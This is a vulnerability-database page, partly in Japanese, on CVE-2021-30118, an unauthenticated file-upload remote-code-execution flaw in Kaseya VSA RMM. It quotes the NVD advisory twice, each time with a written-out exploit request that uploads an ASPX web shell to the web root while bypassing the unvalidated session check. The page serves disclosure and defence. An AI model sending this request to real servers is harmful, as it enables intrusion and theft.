目標達成 すべての支援者に感謝 — 100%達成しました!

目標: 1000 CNY · 調達済み: 1000 CNY

100.0%

CVE-2021-30118— Kaseya VSA RMM 代码问题漏洞

CVSS 9.8 · Critical EPSS 58.63% · P98
新しい脆弱性情報の通知を購読するログインして購読

I. CVE-2021-30118の基本情報

脆弱性情報

脆弱性についてご質問がありますか?Shenlongの分析が参考になるかご確認ください!
Shenlongの10の質問を表示 ↗

高度な大規模言語モデル技術を使用していますが、出力には不正確または古い情報が含まれる可能性があります。Shenlongはデータの正確性を確保するよう努めていますが、実際の状況に基づいて検証・判断してください。

脆弱性タイトル
Unauthenticated Remote Code Execution in Kaseya VSA < v9.5.5
ソース: NVD (National Vulnerability Database)
脆弱性説明
An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System.Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="System.IO" %> <%@ Import namespace="System" %> <%@ Import namespace="System.Data" %> <%@ Import namespace="System.Data.SqlClient" %> <%@ Import namespace="System.Security.AccessControl" %> <%@ Import namespace="System.Security.Principal" %> <%@ Import namespace="System.Collections.Generic" %> <%@ Import namespace="System.Collections" %> <script runat="server"> private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise.
ソース: NVD (National Vulnerability Database)
CVSS情報
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ソース: NVD (National Vulnerability Database)
脆弱性タイプ
N/A
ソース: NVD (National Vulnerability Database)
脆弱性タイトル
Kaseya VSA RMM 代码问题漏洞
ソース: CNNVD (China National Vulnerability Database)
脆弱性説明
Kaseya VSA RMM是瑞士卡西亚(Kaseya)公司的一套远程监控和终端管理解决方案。 Kaseya VSA Unified Remote Monitoring & Management 9.5.5之前版本存在代码问题漏洞。攻击者可利用该漏洞远程执行代码。
ソース: CNNVD (China National Vulnerability Database)
CVSS情報
N/A
ソース: CNNVD (China National Vulnerability Database)
脆弱性タイプ
N/A
ソース: CNNVD (China National Vulnerability Database)

影響を受ける製品

ベンダープロダクト影響を受けるバージョンCPE購読
-n/a n/a -

II. CVE-2021-30118の公開POC

#POC説明ソースリンクShenlongリンク
1An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request- ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host- 192.168.1.194 Cookie- sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length- 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System.Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="System.IO" %> <%@ Import namespace="System" %> <%@ Import namespace="System.Data" %> <%@ Import namespace="System.Data.SqlClient" %> <%@ Import namespace="System.Security.AccessControl" %> <%@ Import namespace="System.Security.Principal" %> <%@ Import namespace="System.Collections.Generic" %> <%@ Import namespace="System.Collections" %> <script runat="server"> private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise. https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-30118.yamlPOC詳細
AI生成POCプレミアム

公開POCは見つかりませんでした。

ログインしてAI POCを生成

III. CVE-2021-30118のインテリジェンス情報

登录查看更多情报信息。

Same Patch Batch · n/a · 2021-07-09 · 49 CVEs total

CVE-2021-3011610.0 CRITICALUnauthenticated credential leak and business logic flaw in Kaseya VSA <= v9.5.6
CVE-2021-301209.9 CRITICAL2FA bypass in Kaseya VSA <= v9.5.6
CVE-2021-301179.8 CRITICALAuthenticated SQL injection in Kaseya VSA < v9.5.6
CVE-2021-234058.3 HIGHSQL Injection
CVE-2021-302017.5 HIGHUnauthenticated XML External Entity vulnerability in Kaseya VSA < v9.5.6
CVE-2021-301216.5 MEDIUM(Semi-)Authenticated local file inclusion in Kaseya VSA < v9.5.6
CVE-2021-301195.4 MEDIUMAuthenticated Authenticated reflective XSS in Kaseya VSA <= v9.5.6
CVE-2020-35987Rukovoditel 跨站脚本漏洞
CVE-2020-25875Codoforum 跨站脚本漏洞
CVE-2020-25876Codoforum 跨站脚本漏洞
CVE-2020-25394moziloCMS 跨站脚本漏洞
CVE-2020-21333PublicCMS 跨站脚本漏洞
CVE-2021-35358Dotcms dotCMS 跨站脚本漏洞
CVE-2021-35361Dotcms dotCMS 跨站脚本漏洞
CVE-2021-35360Dotcms dotCMS 跨站脚本漏洞
CVE-2021-36371Emissary-Ingress 信任管理问题漏洞
CVE-2021-33214Hms Networks eCatcher 安全漏洞
CVE-2021-33792Foxit Reader 和 Foxit PhantomPDF 缓冲区错误漏洞
CVE-2021-33795Foxit Reader和Foxit PhantomPDF 安全漏洞
CVE-2021-27038Autodesk Design Review 安全漏洞

Showing 20 of 49 CVEs. View all on vendor page →

IV. 関連脆弱性

V. CVE-2021-30118へのコメント

まだコメントはありません


コメントを残す